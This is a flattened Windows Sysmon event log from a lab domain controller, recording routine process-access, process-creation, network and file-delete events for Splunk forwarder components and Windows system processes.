12:07:03.764{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65E7-6064-5801-00000000AE01}5536C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65E7-6064-5801-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.766{266CAFBE-65E7-6064-5801-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.389{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97D08D3D41A582287B764857409FC620,SHA256=0FD11EC6C3FB9FBB9882185AFB74CD0A4DD10B30C33A2DFA63DCE7826D4B4D6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.030{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65E6-6064-5701-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65E8-6064-5901-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000010172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:04.733{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-65E8-6064-5901-00000000AE01}1828C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.733{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65E8-6064-5901-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.734{266CAFBE-65E8-6064-5901-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000010165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.633{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53677-false10.0.1.12-8000- 23542300x800000000000000010164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:04.405{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=815EC4B1BF8D1960F6EFF375248DB2C9,SHA256=C8193AEB47DAB0C6ABAB0AA116DADC77F03F7896A935B99092930BAAEB6465BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:05.467{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE44867B90AB807761ECD06DCF7F3A77,SHA256=EAB2868FBBE450747AB66FCD5FF413EFD961CB33C36C621296ABD83546981B15,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.498{266CAFBE-65EA-6064-5A01-00000000AE01}61763560C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.482{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8040BDF174C7E8AD51D9120647B2244B,SHA256=699761833AEA4638C57B2BEB547B2F1CBDB8CBDC50518F729239F69B43BF1D42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65EA-6064-5A01-00000000AE01}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:06.342{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:06.342{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-65EA-6064-5A01-00000000AE01}6176C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65EA-6064-5A01-00000000AE01}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:06.342{266CAFBE-65EA-6064-5A01-00000000AE01}6176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.935{266CAFBE-65EB-6064-5C01-00000000AE01}48646864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65EB-6064-5C01-00000000AE01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:07.763{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 